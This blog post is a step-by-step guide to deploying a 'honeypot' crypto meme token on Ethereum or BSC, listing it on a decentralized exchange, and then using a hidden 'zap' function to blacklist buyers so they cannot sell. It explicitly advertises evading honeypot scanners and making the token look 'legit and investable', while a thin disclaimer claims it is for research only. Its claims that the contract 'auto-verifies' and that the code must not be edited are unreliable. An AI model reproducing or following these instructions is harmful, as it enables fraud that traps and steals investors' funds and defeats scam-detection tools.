How To Create Your Honeypot Meme Token In 2024 Guide



Blockchain Lizard Here, Ethereum smart contract researcher and enthusiast. I got a lot of requests from fans for me to discover honey pot tokens, which cannot be sold after being purchased.

So today, let me introduce you to some useful tips on How to Create Your Own Honeypot Token that can Blacklist addresses and is Honeypot Detector Proof (Upgraded Version V2). Are you ready?

 [Only for research and testing, don’t try to scam using this method]

 

High-End Advanced Honeypot Token(Able to Blacklist addresses, Honeypot Detector Proof, cannot be detected by honeypot scanner, make your honeypot token looks more legit and investable, higher level & more advanced honeypot token)

 

**The Source Code At The End Of This Post Below

Part 1: Use REMIX and Metamask to create a token

1. First install Metamask wallet https://metamask.io/ on your computer and create an account/ wallet.

2. Browse Remix IDE http://remix.ethereum.org/ You need to use Remix IDE to deploy smart contract.

3. Connect metamask to REMIX IDE. Click your Metamask plugin.



Click the “Not connected” button and connect it.

4. Back to REMIX IDE. Click Create New File.

5. Name your file as you like, remember to add .sol at the back. EXAMPLE here, DevToken.sol

6. Copy and paste the code into the space. (The code is below the post)

#Do not attempt to change any code or else it won't work#


#Code at the bottom of the post.#

7. Click the icon on the left as shown below,

Select the compiler as below, 0.8.24 …..

Then click compile.

8. After compile. Click on the icon as shown below, and select Metamask on the Environment section (because we're using Metamask wallet)

9. On the Contract section, select DevToken as the contract.

10. Click the box beside Deploy with Proxy

You will see the token setting after you click the box beside Deploy with Proxy

11. Now we are going to do some token setting.

NAME: (Your token Name) *Write the token name inside the bracket "xxxxx"

SYMBOL: (Give it a symbol) *Write the token symbol inside the bracket "XXX" TOTAL

SUPPLY: (Set your total token supply, if your decimal is 18, and you want 1000000 total supply, then type in 1000000000000000000000000, cuz 1000000 + 18*0)

*Write total supply inside the bracket "......"

Add eighteen “0” after the quantity you want (if u set 18 as decimal). For example, if you want to issue 1000000 tokens, the correct input should be 1000000000000000000000000

DECIMAL: 18

After you are done, we can move to the new step.

12. Click the "Deploy" button.

13. After you click the Deploy button, you will see a pop-up, Click Proceed

14. Click on confirm on the transaction on your metamask Pop-up. If nothing happens there, you need to connect your metamask wallet to REMIX IDE.

15. After the transaction is successful, you will get another pop-up, click OK

16. After you Click OK from the previous step, You will get another metamask pop-up, Click on confirm on the transaction on your metamask pop-up.

So there will be a total of 2 transactions on Metamask pop-up that you will have to Confirm.

#If you are missing any transactions, you may refresh remix IDE and repeat those above steps to get the 2 transactions of Metamask pop-up.#

17. If everything goes smoothly, your token is on its way. Back to metamask, go to Activity, and click on the Contract deployment that's on the first of the list.


Click view on Block Explorer

Copy the contract address by clicking the [copy] icon button on the right.

15. Go back to metamask, and click import token.

Select Custom Token, and paste the contract address, and wait for your token to show up, then click Add Custom Token

You can create tokens in ETH mainnet, Binance Smart Chain, Arbitrum One, Blast, and any other chains using the same method.

Congratulation! You successfully created your own token and they are in your wallet!

Dev, can we start to list our tokens? 

Yes, you can start to list your token.

You don’t need to Verify the Contract of this token because the token is slightly different from any other token and it will auto-verify the contract itself.


Part 2: Listing Your Token & Verify Your Contract

(You do not need to verify the contract as this token is different from other tokens.)


You can list your token in Decentralized Exchange (DEX) Listing.

If u use Ethereum mainnet, use Uniswap, link: https://app.uniswap.org/#/swap

If u use BSC (Binance Smart Chain), use Pancakeswap, link: https://pancakeswap.finance/

If you are using Pancakeswap on Binance Smart Chain, you can read this guide on how to add liquidity in Pancakeswap.


*Important Step#1

Imagine you added some liquidity to your token, and some buyers are buying your tokens.

They are holding your tokens, and they can sell them back.

We will not make this happen, so we need to BLACK LIST them.

Let's move to our first step.

-----------------------------------------------------------

1. Back to Metamask wallet, go to Activity, and Click Contract Deployment (first one) to view the transaction



2. Click View on Block Explorer

3. Click the blue token name to enter the token page.


4. On the token page, you can view transactions/transfers of your tokens.

Assume some buyers are buying your tokens, here is a buy transaction shown in the picture below. Click on the address pointed with red arrows as shown in the picture to view the buyer

5. Click the copy button as shown in the picture below to copy the address of the buyer

6. Now go back to Remix IDE, and click the little triangle arrow of ERC1967PROXY as shown below. Remember to click the little triangle arrow of ERC1967PROXY

7. After you click the little triangle arrow, Scroll down until you see the zap button.

Click the small triangle arrow of the zap button.

8. Paste the buyer address that you wish to blacklist in the space on (uzer). Then click transact.

uzer:(Buyers addresses to be blacklisted)

*Take Note: After the transaction, that particular wallet address that you paste in the space will be blacklisted, and they will not be able to sell their tokens

*Buyers can sell their tokens if their addresses are not blacklisted

*Important Step#2

If you close your Remix IDE accidentally, what should you do? How to continue setting the blacklist function?

Needless to say, I got your back. Follow the steps below.

1. Go back to Remix IDE, select the .sol file that you use to create your token

2. Click the icon on the left as shown below,

Select the compiler as below, 0.8.24 …..

Then click compile.

3. After compile. Click on the icon as shown below, and select Metamask on the Environment section (because we're using metamask wallet)

4. On the Contract section, select DevToken as a contract.

5. Click the box beside Deploy with Proxy

6. Now, go back to Metamas, Click activity, Click Contract Deployment (first contract deployment), Click View on Block Explorer



7. Copy the contract address by clicking the [copy] icon button on the right.


8. After clicking the copy icon, Back to Remix IDE and paste the contract address into the space as shown in the picture below.

9. After you are done pasting the contract address into the space, click At Address button (blue button)

10. After you click At Address (blue button), click the little triangle arrow at DEVTOKEN (this time it is DEVTOKEN) as shown in the picture below.

11. After you click the little triangle arrow, Scroll down until you see the zap button.

Click the small triangle arrow of the zap button.

12. Paste the buyer address that you wish to blacklist in the space on (uzer). Then click transact.

uzer:(Buyers addresses to be blacklisted)

*Take Note: After the transaction, that particular wallet address that you paste in the space will be blacklisted, and they will not be able to sell their tokens

*Buyers can sell their tokens if their addresses are not blacklisted

#Remember, this post is for testing and educational purposes only, do not try this at home!#

That is all in my opinion. Of course, this is not the end, there are many ways and techniques you can do with this token to maximize the effect.

We will discuss more about token tips and techniques in our next post.

Good luck with your tokens!

Source Code: https://blockchainlizard.blogspot.com/2024/03/honeypot-token-smart-contract-source.html

Any questions?
Contact me: https://t.me/blockchainlizard
My website: https://blockchainlizard.blogspot.com

*Any unauthorized edits of code might result in failure of deployment.

Learn How To Use Flash Loan Bot: https://blockchainlizard.blogspot.com/2024/03/guide-to-create-flash-loan-crypto.html




Previous Post Next Post